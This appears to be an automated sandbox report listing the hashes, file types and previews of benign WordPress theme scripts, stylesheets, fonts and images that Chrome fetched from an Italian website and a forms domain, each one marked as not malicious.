                                                                                                                                              Preview:<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 36 36"><path fill="#77B255" d="M36 32c0 2.209-1.791 4-4 4H4c-2.209 0-4-1.791-4-4V4c0-2.209 1.791-4 4-4h28c2.209 0 4 1.791 4 4v28z"/><path fill="#FFF" d="M29.28 6.362c-1.156-.751-2.704-.422-3.458.736L14.936 23.877l-5.029-4.65c-1.014-.938-2.596-.875-3.533.138-.937 1.014-.875 2.596.139 3.533l7.209 6.666c.48.445 1.09.665 1.696.665.673 0 1.534-.282 2.099-1.139.332-.506 12.5-19.27 12.5-19.27.751-1.159.421-2.707-.737-3.458z"/></svg>
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:ASCII text
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):23077
                                                                                                                                              Entropy (8bit):4.911677492624258
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:384:gMybakaQxizORQOupjvwenWjWzvHaI8agy6Gupgd/6sbOxYv3:gPakxMznO0jFnWSbLryssYP
                                                                                                                                              MD5:9E21BB665D0B5A15EB7FCA931D60523B
                                                                                                                                              SHA1:F51855E2FF2F7BAB57CD03AA190D749CF90357C3
                                                                                                                                              SHA-256:157C0E609B5F8A0A961A305ADFD944420DBE37057248785A99175DF73FDD1A9F
                                                                                                                                              SHA-512:CDC1B9FC58F6C4C5D87191DB27C32F657E1845CC15A36705090BCDD0D22B07A0C45FF23E013EF6151494EE67C2870B8A01B5FE009CC3F002F97F63DC6A326E81
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              URL:https://www.cipassoitalia.it/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/slideshow/slideshow-video.js?ver=6.0.9
                                                                                                                                              Preview:// -------------------------------------------------------------------------------------------.// .// AVIA VIDEO API - make sure that youtube, vimeo and html 5 use the same interface.// .// requires froogaloop vimeo library and youtube iframe api (yt can be loaded async).// .// -------------------------------------------------------------------------------------------...(function($).{. "use strict";...$.AviaVideoAPI = function(options, video, option_container)..{....this.videoElement = video;......// actual video element. either iframe or video...this.$video.= $( video );......// container where the AviaVideoAPI object will be stored as data, and that can receive events like play, pause etc ...// also the container that allows to overwrite javacript options by adding html data- attributes...this.$option_container = option_container ? $( option_container ) : this.$video; ......// button to click to actually start the loading process of the video...this.load_btn = this.$option_conta
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:ASCII text
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):849
                                                                                                                                              Entropy (8bit):4.501336493442654
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:12:2aSUqG+HMVVwVwBFe1D+WGkv+sDeTbmRoeIROMfDzMzvs7/laXfLsbvsWsKm7aXr:2rMVVw2BFe4w5Ksoe5QcDsbueb
                                                                                                                                              MD5:18ED7837CAAADC19C343B8C9BDFD9248
                                                                                                                                              SHA1:5200AAFAA57ED6071899FDC920947AD0A6FAB137
                                                                                                                                              SHA-256:3831E5C07B5FAB004471D91C7654B71924A24B85A05BA271D19A62348A5CF565
                                                                                                                                              SHA-512:763A2A90C169EB086D9E4A313615BF8B0ABA44CC6E33E7D8B2AD3B06BD36C0EA9E4C4A073EA17E8100DDCB656D8C0014D848C3B70E259A17ABAC2F8621A47215
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              URL:https://www.cipassoitalia.it/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/slideshow_layerslider/slideshow_layerslider.js?ver=6.0.9
                                                                                                                                              Preview:(function($).{.."use strict";..// -------------------------------------------------------------------------------------------.// makes sure that the fixed container height is removed once the layerslider is loaded, so it adapts to the screen resolution.// -------------------------------------------------------------------------------------------..$.fn.layer_slider_height_helper = function(options).{..return this.each(function()..{...var container .= $(this),....first_div .= container.find('>div:first'),....timeout .= false,....counter .= 0,....reset_size .= function()....{.....if(first_div.height() > 0 || counter > 5).....{......container.height('auto');.....}.....else.....{......timeout = setTimeout(reset_size, 500);......counter++;.....}....};....if(!first_div.length) return;....timeout = setTimeout(reset_size, 0);..});.}...}(jQuery));
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:ASCII text
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):2996
                                                                                                                                              Entropy (8bit):4.0773068909292185
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:48:sWGjgI1GYYv+IGL63IevoyiO/b2g1vnKBFF9j:sWGjRGYYvXGcRQyiO/Sg1vnK7Tj
                                                                                                                                              MD5:B55E7C1D322D644E1644496EF0D8C7C3
                                                                                                                                              SHA1:D3F2DC4D08D81D3769498396C91737AF12735FEA
                                                                                                                                              SHA-256:D000CBDC4EAF4968F59DB635892E36BDE66D1563CA301F5AD52A5791FB9CECB3
                                                                                                                                              SHA-512:E298A029E8F3EDEFCCCDC0B40D958B5BC82D9F96B1CA89E01EE821017E6D7B015C9D9333C3A11ECE5E6B6EC4961304B9418156BB5A3A8CA0EBD1728D092909EB
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:// -------------------------------------------------------------------------------------------.// Message Box.// -------------------------------------------------------------------------------------------..(function($).{. "use strict";.. $.fn.avia_sc_messagebox = function (options) {.. "use strict";.. return this.each(function () {.. var container = $(this),. close_btn = container.find('.av_message_close'),. mbox_ID = container.attr('id'),.. aviaSetCookie = function(CookieName,CookieValue,CookieDays) {. if (CookieDays) {. var date = new Date();. date.setTime(date.getTime()+(CookieDays*24*60*60*1000));. var expires = "; expires="+date.toGMTString();. }. else var expires = "";. document.cookie = CookieName+"="+CookieValue+expires+"; path=/";. },..
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):7238
                                                                                                                                              Entropy (8bit):4.8628010967352076
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:YF9D9Q3Pt4dlFDe98GjK81nxpw9Hzx7YYUnxiCLc/fYo5gUuenI1:69D9Q3PtelFDMH71xpOlBiH8uMI1
                                                                                                                                              MD5:09B08C6DC04BFDAB0A31DA73CBA34EB2
                                                                                                                                              SHA1:29B37614F602A336A266702BF609DD3214E1BA30
                                                                                                                                              SHA-256:0332A5F4F922B4444F56E6FBF32034407BA146690A78E181126DA759B81C1BE3
                                                                                                                                              SHA-512:75FA7D15A53BC013BFDF51AACD0B85B12FBDA4BF32661966C8D4F149E098904A6CB37871376522151B63983A8A9B2E5984FC4110DCB687709330786668F128D5
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:(function($)..{ ..."use strict";......// -------------------------------------------------------------------------------------------...// Tab Section...// -------------------------------------------------------------------------------------------......$.fn.avia_sc_tab_section= function()...{....var win ...= $(window),.....browserPrefix .= $.avia_utilities.supports('transition'),.....cssActive ..= this.browserPrefix !== false ? true : false,.....isMobile ..= $.avia_utilities.isMobile,.....transform3d..= document.documentElement.className.indexOf('avia_transform3d') !== -1 ? true : false,.....transition..= {};.........return this.each(function()....{.....var container ..= $(this),......tabs...= container.find('.av-section-tab-title'),..... tab_outer..= container.find('.av-tab-section-outer-container'),......tab_wrap..= container.find('.av-tab-section-tab-title-container'),......tab_nav...= container.find('.av_tab_navigation'), ......content_wrap.= container.find('.av-tab-section-inner
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:ASCII text
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):10267
                                                                                                                                              Entropy (8bit):5.081060823587943
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:192:KK+dBl6gKYu7Dnsvcgr2VT2EpHgXchg7uEoyXIby:Ql5/u7DnsotsD
                                                                                                                                              MD5:792EAE5A82FA86A4E510BDE5D33019FA
                                                                                                                                              SHA1:F6B97F373DDF899D8675EBE2C17A7B3E8085CF14
                                                                                                                                              SHA-256:D232B8573CA858C9A3C2635A34113BCE431327DA59D5AD19965A0228EEE75CAB
                                                                                                                                              SHA-512:91B53C622B63C2A0256DB7D9E6358261849F2B692347F3221211CC49A97A2AA0FC334767D938BD74D1722DAC0F71BC8B41B7EECF1B837746D013E01A951D3222
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              URL:https://www.cipassoitalia.it/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/portfolio/portfolio.css?ver=6.0.9
                                                                                                                                              Preview:/* ======================================================================================================================================================.Portfolio/Post Grid.====================================================================================================================================================== */.#top .grid-sort-container .no_margin.av_one_half {. width: 49.999%;.}....sort_width_container{.margin: 30px 0;.}...entry-content-wrapper .sort_width_container:first-child{margin-top:0;}...sort_width_container, #js_sort_items{.overflow: hidden;.position: relative;.clear: both;.}..#js_sort_items{.visibility: hidden;.font-size: 0.9em;.}..#js_sort_items a{.display:block;.float:left;.text-decoration: none;.}...av-cat-count{display: none; }..#js_sort_items .text-sep{.float:left;.padding:0 6px;.}...grid-sort-container{.clear: both;.position: relative;.z-index: 20;.}...isotope_activated .isotope-item{.margin-left:0;.}..#top .isotope-item{.z-index: 2;.}..#top .isotope-hid
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:Web Open Font Format (Version 2), TrueType, length 16784, version 1.0
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):16784
                                                                                                                                              Entropy (8bit):7.986348099914447
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:384:YD/YfZ+W79UbMrHjxlC27mYrL7je1T8jw9clo0vzzSo4Uv:YK0W79wGxln7mYrTe1ITXzmbe
                                                                                                                                              MD5:B6C8E60E23068CF82686D1FECF0BE576
                                                                                                                                              SHA1:D5E500F0DCCFD999D6957E9BBCE3DCB0BB0A703F
                                                                                                                                              SHA-256:2C30593BE2E61F96B73E355F3B10ED55479DC5F8F2FF31DEA8AF21B87AA072C5
                                                                                                                                              SHA-512:4D07090A88F451BDB36FE6A319B3BEC5BC4F440B29B13BD438FD5D2051D6250500854E9173445BF31ED544017CD8E5C97296FC9F175B0A47A70628C58F7A12BA
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              URL:https://forms.pienissimo.com/Flaticon.646ed006079ab0b728f1.woff2
                                                                                                                                              Preview:wOF2......A.......vd..A7........................?FFTM..`..J..........H.t..6.$.|. ..<..s.>^U.r.8....f$.jsL....:..{.B....9.W...2N\!...)u.8.....eYSmi...8e......}.......g&..s*.R.RX.\.k.....k;.D".G......K...wo..72.3y.S...3!.......7 ..*S.........:V..:j+..vc....o..._M..dWe.,...-[..l'..ah.l.x2...u.../.$,....h._..!.;{..e[..%....:......x..1..A..2.=....."X...g.~..E.....K.B.K.A.o<...,..U-..$k.+'.......r...r....j..........O3$...7h.KA{!..v.sQ..DQ.H.V.t1V...R...u..2..wc.xd!.@E.... .._.5....r...)AB"Q...`mo...B..o..2.7.$.O...Z.....0\[-.O....3..p...bI..7...C.j...}......,.....e1.Rz ...I...2......n".X5Q.uR..........b...q...J.|......h.21R..)..A..|r..`p+U....`m8F!..N...*...50b..I.d...9a....:....@%....gj..h.h...V......&.G ....<C.@..h..u..V...n...W...r..T.e..~.]U......Ae.;L..+....o.....J..p:.6.C.+j...#.RG.....^..4..H0.(....{?.....%.?.H.......q......2..~..*X.&}!{P...K.X..q..)...cy..1.'.... ......D^.S.....?..7P.8ubBM.b.........'.....{.Z.......XZ..p1Ok....T._....I..P..}D.
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:PNG image data, 18 x 12, 8-bit/color RGB, non-interlaced
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):267
                                                                                                                                              Entropy (8bit):6.34426489571429
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6:6v/lhPFMkcC/QCllL4N/02j27XW+zFarJUma+7dp:6v/7tH/MN/02j27X7zFara87z
                                                                                                                                              MD5:9C6287BDF64843201AF93FF1AFBFAC6C
                                                                                                                                              SHA1:A31D1F6A6DC624C02A6E7767BD9D5AD894C7CDDB
                                                                                                                                              SHA-256:85D05871F6315412DE38A72C7164FD4917EFBA135BA06ED9972C502C1FD811FF
                                                                                                                                              SHA-512:E6AF1947CD5112AC5CCD5042A62FC2F697CAEBAB3441E28D9B3BACD1D6798ECBF099B251CC5D35B62C1D776F6187079E82CE1EAF5B9F5BC882961681C1049877
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              URL:https://www.cipassoitalia.it/wp-content/plugins/sitepress-multilingual-cms/res/flags/it.png
                                                                                                                                              Preview:.PNG........IHDR..............pz....+tEXtCreation Time.do 29 dec 2005 02:35:37 +0100........tIME.....(.HYx.....pHYs...........~.....gAMA......a....cIDATx...1.. ....L.."...N ....!...?L%_:...n ..-..C..._MRy..T...VS...=%V.-..?3...Rx..X.1..|3".....|.(.-.W.....IEND.B`.
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:PNG image data, 1222 x 630, 8-bit/color RGBA, non-interlaced
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):1268031
                                                                                                                                              Entropy (8bit):7.988423203500793
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24576:IVkYjgK1/q5Tj9LQQc5XrXeKKme+zVZmA7CUd3R8wD+J8IHjNH2BEKR/1RDQ/4:IWYjC5Tj9cQm7nKmXJZD7CEXD+J8AcNB
                                                                                                                                              MD5:70002FB6B8C65AA21997EF20178127D3
                                                                                                                                              SHA1:6E08F68FF4C2419835E30836FBE33C6DBD42F346
                                                                                                                                              SHA-256:C794957D89A7FC2CF33573523070167A76ED63E72C8296F316302AFD61FFC7E8
                                                                                                                                              SHA-512:1E836E887A61EE0EA0F2A41223C8B3C356E45E0A961D48169872FB71F555F76EBAC8866AEE8BF04037EA0FF02A9C8897E6F8C5911073F645B05AFFD4BD533FE3
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              URL:https://www.cipassoitalia.it/wp-content/uploads/2024/08/Schermata-2024-08-29-alle-09.26.09-1222x630.png
                                                                                                                                              Preview:.PNG........IHDR.......v.............IDATx.t.].,K.-..3...kW...W.%$...u.........x..._.A..9.....f<.s.\u.J[k.5.....n6l|.....5..@...`.H9C p....rB.1.BR.....R..c..........y..>Ps."#k.W-(..(....Q3T.GI..g9.i.)#..Z.J*.9..()!'.B.r.BP..3A..n.&.L..8k...sGI..........T+D.*......P.{...&...BD...S.\..4......A....../03.....)..P.D0.....7.4....p..........@0.a.!%.4....0.AE1.@.%.....OU~......C.L..Q..I.>...*D.%g.9.I0.Qr.. I......M....GJ."..@D....)%......s.R0.#.....CU..07..>......TM....x.4.....".U...g.=..X.....l.7...O~......h....\..?.5....Za...?gp...............w.......s...u..a6a>1F....1m.........'.l...OL...x...x...O...x._..'............).;g .xf.P.._8._Q..~.<N...<.@..5W<..L....PQ....5.H9CE HH....0E..I.\..I....B.q..I.D.T.~...|.o...}/u...{&..4^s?..T4.....E.,.$...".k....51G...|.`..|L.[<.../.10z..c..>x.}.Yrw\m..D..P.L..8J.....:.q....s...iPu.,Hj(I!b()....ums..._H.......x..1.r>!n.np(.2....TOh.x..J} ..Z+....8jE..Y3F..t.~..s...a..V..$@.-"...f.,.....RJ.U.q....(%.l@2?K..6....d\......j..O
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:PNG image data, 75 x 75, 8-bit/color RGB, non-interlaced
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):25358
                                                                                                                                              Entropy (8bit):5.006278877714235
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:384:lJN9NvO3tM5sSo72OlJYlRbVu+R48HAm/hh+:XN9Nv4tXX7v09uM4mr6
                                                                                                                                              MD5:35F6EF9958F82B885739F7321990C682
                                                                                                                                              SHA1:8822B7B4F49C075851B682FC086B370414206F7F
                                                                                                                                              SHA-256:1D08E51346D47A73D485A1C9858885D6B2D67B89ACDF61717675DE2545E9F21F
                                                                                                                                              SHA-512:67F8F5ED0A615847253B15C70FAA5022BC6EA8CDF7AE84389D1A032FB0DB98BD846E9FE04151D821EBA50DE21B6ED724B438D8321465923F6C7165843C59B51F
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              URL:https://www.cipassoitalia.it/wp-content/uploads/2019/06/2.png
                                                                                                                                              Preview:.PNG........IHDR...K...K......,.....pHYs.................iCCPPhotoshop ICC profile..x..wT.Y.......-!.RBo....k...FH ...B.......X...eDFD... cA,X..{..AE]..6T....{v..=g.s.9..{........Nr.R1...-..b...I.)l.. .......\.ott8...p.....6\.T..[...sy.H4...sy...1...'....$.0^*......`..S..-...Lr=.0.&............D.re...].`...r..'....E.....x.\>.M........h..`..O>...LSzr..%O......Q.T.].....+..0...P....$..&kI..%i.QS,.O......!.S...O.b>7 l..Y.S.M...9qS,[.....#....%....Nq.(.3....)..%DNqnVl......S.({..)g.....K...Q.....G...#..)}......J=7/VyV..S....i.h.."..<y.29.....r.H ..}.Rq:.#...b;...$%..'......@XW...N....D0.q..N<.`|.........)dy.......P.&h.>.....8...@ .B..A2,...!.d...`..C)l..P......!8.mp...E..}p......K...0. ...#.D.1@L.k..qE..@$..A..TD.H..R..CJ.2...4"."'...e....."#.[....4...f.l...E..8t!*@s.|...V.u.A..=.^Eo...Kt.....0C..s...(,...d.*.....f....n`..+.3..c..8.........rp.p.qU...V.y... n...O.....x.>././...+..............E0'..B..L...F..B....O."...Dm.5..E....b.N.A...u.0...J2 9..H)$.i-..t.t.t
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:ASCII text
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):2078
                                                                                                                                              Entropy (8bit):4.879299681230514
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:7ncCtt0+I9xjE/Fkqf1WmEfjNQ+O9BQ5STH7w6SqUYtmMyn7SHqflhqQxUyrGqC/:7nciKSNkqf6TYQmLSeF0OWVS3fL
                                                                                                                                              MD5:9A7C8D4A3CBAFF2CF91981A885FF1516
                                                                                                                                              SHA1:C9C53CE90AC96D7321F789E09BB3086CD54E23F7
                                                                                                                                              SHA-256:D597624F04518ACF36182FACF3EAFFCE999178B14C6C5C3D48F108B52A88203A
                                                                                                                                              SHA-512:6C97CC62AC6C8ABBF8CBEFBE774D94DCE22852A353A1BD24402C3C8FD13C1603786370C2BB08FB3E7C280836209F30F4A9E81108F6B0E49FC703D1073A10B4C0
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              URL:https://www.cipassoitalia.it/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/slideshow_feature_image/slideshow_feature_image.css?ver=6.0.9
                                                                                                                                              Preview:/* ======================================================================================================================================================.Slideshow Feature Image Slider.====================================================================================================================================================== */.#top .avia-featureimage-slideshow{ margin:0; }..#top .avia-slideshow-fixed-height > li{.position: absolute;.width:100%; height:100%;.background-size: cover;.background-position: center center;.}...avia-featureimage-slideshow .caption_container{..height:100%;.}...avia-featureimage-slideshow .slideshow_caption h2{..margin:0;..text-shadow: 0px 0px 7px rgba(0,0,0,0.7);.}...avia-featureimage-slideshow h2.avia-caption-title:after {. display: block;. content: "";. width: 40px;. border-top: 3px solid #fff;. margin: 11px auto;. position: relative;. top: 7px;.}...main_color .av-no-image-slider h2 a{..text-shadow: none;.}...avia_desktop .avia-
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:ASCII text
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):685
                                                                                                                                              Entropy (8bit):4.353846854825342
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:12:2r/t0BkT8WGSzReJmKLEl2e9GBqHmTXFBTl2XFuUMJutMb:2LuBkgMIJmKLA2eaTXFT21uUMJuWb
                                                                                                                                              MD5:0E4728339010DF1327BE3712965E0BB5
                                                                                                                                              SHA1:969FE827736729AC4B593308FE5B97506B209EBF
                                                                                                                                              SHA-256:1951200C247279D31F6C253F3018ED34ABD57B0D20B62C34352FC57BF10D8CDA
                                                                                                                                              SHA-512:11324FFBA55A77D85F466A1E9C3817CDF4B832FAD07C87AA6C41976EE437FB5733B6F5C7D199D61E9E8A6963A16F346E693FFF2EC52B63B22D2AEC25FC7B1166
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              URL:https://www.cipassoitalia.it/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/iconlist/iconlist.js?ver=6.0.9
                                                                                                                                              Preview:(function($).{ .."use strict";....// -------------------------------------------------------------------------------------------..// Iconlist shortcode javascript..// -------------------------------------------------------------------------------------------....$.fn.avia_sc_iconlist = function(options)..{...return this.each(function()...{....var iconlist = $(this), elements = iconlist.find('>li');........//trigger displaying of thumbnails....iconlist.on('avia_start_animation', function()....{.....elements.each(function(i).....{......var element = $(this);......setTimeout(function(){ element.addClass('avia_start_animation') }, (i * 350));.....});....});...});..}.....}(jQuery));
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:PNG image data, 300 x 143, 8-bit/color RGBA, non-interlaced
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):17383
                                                                                                                                              Entropy (8bit):7.953734195324373
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:384:7ps7VxjdgANe442HnQZyAHugoLIe7eDsFEfzx2fh1r2M334ESJ:7kVxjGA44HHnOyACLIe+sedg1atJ
                                                                                                                                              MD5:89F94E28F27A6229E250935949B94D02
                                                                                                                                              SHA1:73EB36D1C86A093DF75EBD91265A54040CD6B9EF
                                                                                                                                              SHA-256:92737B2E4F1027162F3F4F621E1C2148818386A230EFB4FFA153EF29C3246F29
                                                                                                                                              SHA-512:BC47E33590D96A16055377628275D45D75619594FD5449CB00D47E604481AB64165CE51A59777090C9AD4342019CAE81D6203382E4631EDC01013357D9090C84
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:.PNG........IHDR...,.........@....C.IDATx..}w.$e..S.i.........KXr........fOOi.C.;.;...s...bF.#.. #Y.X`..9.....N.N.....W.4U...gz...O.&.TW...>......H ...H ...H ......A .<.%....!.&.e......&...$.@j.< .../..._a.....t......M.H.8.`..$_.........]/....@ ...@...b..l.Q.Q........h.....@..g.Y).."8e.Pc|E.l.p..{.\...$.@JfU/..m....y.v.x.@..3J...d.|....dQY.WJcg).".>.`!...x*.'...aI..DOo2W.s......8...d6..@.96......\........~A0..ek .....*....9......[...x..V2.C.vN.......de.zz........@...................R...x./.....n.F.K!N..2...p..m.v......X.`......>2.t........B.>..M..=...t..D.j..Z.......B.i&...K.|'...`..H}......A|J;......m.#..\.....fA|c..^1~...g..Yf.....8.O.8D...U.......z~.l...~3.O.x)...0..[.V............d2..h".9..W..k)....'..k.R~.I....6.`.......^......p..W.xm"nm.c.K.....^...2.&.?.4u.... ..;.@.._sp......|..w. .M.T).D....`.....5...Hv.Q.......... ....X.=......e..w.x..w.0..q..B..T.n..H .m...)x........ZV.`...r....L..l..1....x.!~......d..j..&.n.(....>..d...S.q+..V ..D.....e....
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:ASCII text
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):672
                                                                                                                                              Entropy (8bit):4.967792751769964
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:12:2PHM7CYzBiRiocnsG6p6yf2agxNPhz+feTnntWyXoHQIOeYYBMb:2kOYzBci3XSNgx9xnwyYwAYYBMb
                                                                                                                                              MD5:1413AE49C9023A3F89AE95C070FC0CEF
                                                                                                                                              SHA1:90D49808B303E03CFC8E4C6256FF1234282967D4
                                                                                                                                              SHA-256:E3572EB2976BB93C07DD313D9A917D4C6CF89E1A118A48B391B8DE918F999D86
                                                                                                                                              SHA-512:3F67E87FD15B75E5C5A52F45F546874C0605D2759CDB8487B459CFBDAB44BB8752ED354A367B81089F6E31654BB3608EF71C60CDCD2816BA34F9E3F8CF45D144
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:(function($).{ .."use strict";.....$('body').on('click','.av-lazyload-video-embed .av-click-to-play-overlay', function(e){......if(document.cookie.match(/aviaPrivacyVideoEmbedsDisabled/))...{....if (e.originalEvent === undefined) return; //human click only..... ....var src_url = $(this).parents('.avia-video').data('original_url');....if( src_url ) window.open(src_url , '_blank'); ........return;...}.........var clicked .= $(this),....container.= clicked.parents('.av-lazyload-video-embed'),....video..= container.find('.av-video-tmpl').html();........container.html(video);..});....$('.av-lazyload-immediate .av-click-to-play-overlay').trigger('click');...}(jQuery));
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:ASCII text
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):706
                                                                                                                                              Entropy (8bit):4.350290640622491
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:12:2DbNt0Bk6qCWGHyeJktvjKLZHql2e9GBqHmTXFBTl2XiUMJu/b:2DbNuBk6qCpJ8LKLZ62eaTXFT2/MJu/b
                                                                                                                                              MD5:6DB3D0D2AADAB21A9E90678B672948D4
                                                                                                                                              SHA1:C6661AF97C02277DB3B67111DEC804BA75D69E58
                                                                                                                                              SHA-256:33A4663017547D3173AC7167C868398484FFCD6F609657B085F12E132AA89E55
                                                                                                                                              SHA-512:6655AC453A8A3980F4F584002930259E7FBD5ED92E33A539FD729E304728B60AE63527BC658482A10714F8FA9D5B035D61EF2D4ACFE83DE269A9C6234F6D7D9C
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              URL:https://www.cipassoitalia.it/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/testimonials/testimonials.js?ver=6.0.9
                                                                                                                                              Preview:(function($).{ .."use strict";....// -------------------------------------------------------------------------------------------..// testimonial shortcode javascript..// -------------------------------------------------------------------------------------------....$.fn.avia_sc_testimonial = function(options)..{...return this.each(function()...{....var container = $(this), elements = container.find('.avia-testimonial');........//trigger displaying of thumbnails....container.on('avia_start_animation', function()....{.....elements.each(function(i).....{......var element = $(this);......setTimeout(function(){ element.addClass('avia_start_animation') }, (i * 150));.....});....});...});..}...}(jQuery));
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:SVG Scalable Vector Graphics image
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):289
                                                                                                                                              Entropy (8bit):5.03513521833349
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6:tI9mc4sltj4JxTqMDMwlRtuuHWqlqRthzXlqRt3fvFjlC:t43t6MwR3xghVg3f5I
                                                                                                                                              MD5:CC4D943DBAC895A562D174FC60D3A8DF
                                                                                                                                              SHA1:43787164AC316DF0A0131E02C83B7970CE5F8C92
                                                                                                                                              SHA-256:C19557A7703C7239BB32690D9166E34F97D9191E567031292B3C1A5E50176B9C
                                                                                                                                              SHA-512:BCF9A5D7FF770551ED37294E7C6246249C8CE4DE2F51E542744751F0FE52E29D9A7BB143C3374764B8E2581E9D9017FD8F245AF5A67462C746221CFF36859D71
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:<svg xmlns="http://www.w3.org/2000/svg" id="flag-icons-fr" viewBox="0 0 640 480">. <g fill-rule="evenodd" stroke-width="1pt">. <path fill="#fff" d="M0 0h640v480H0z"/>. <path fill="#002654" d="M0 0h213.3v480H0z"/>. <path fill="#ce1126" d="M426.7 0H640v480H426.7z"/>. </g>.</svg>.
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (875)
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):3337
                                                                                                                                              Entropy (8bit):5.361120226462222
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:zZhBd+OKh0eZhrWxLEQv9wkjZji1j8ZL7jDJl/x:zD3X2TZhrWKmuk5iSt7jDDx
                                                                                                                                              MD5:38BFD2BF78B4F64A9A3746BCC8E75055
                                                                                                                                              SHA1:26F069056A8A54DDBCFEAC7386DC845B8EF6DEDB
                                                                                                                                              SHA-256:BF390AF928533178606C8803B2C1250E0E01B92AE051AFE34B52C629B1B733CC
                                                                                                                                              SHA-512:0CF1CDCC8EC8907EF74C013E63D38D60F76B31F17C525E88E48B61AF2DFFAEF668AF4DE2D502993FCC543221D476952ED5424CEED0931CFB774F2E318CA904E5
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              URL:https://forms.pienissimo.com/
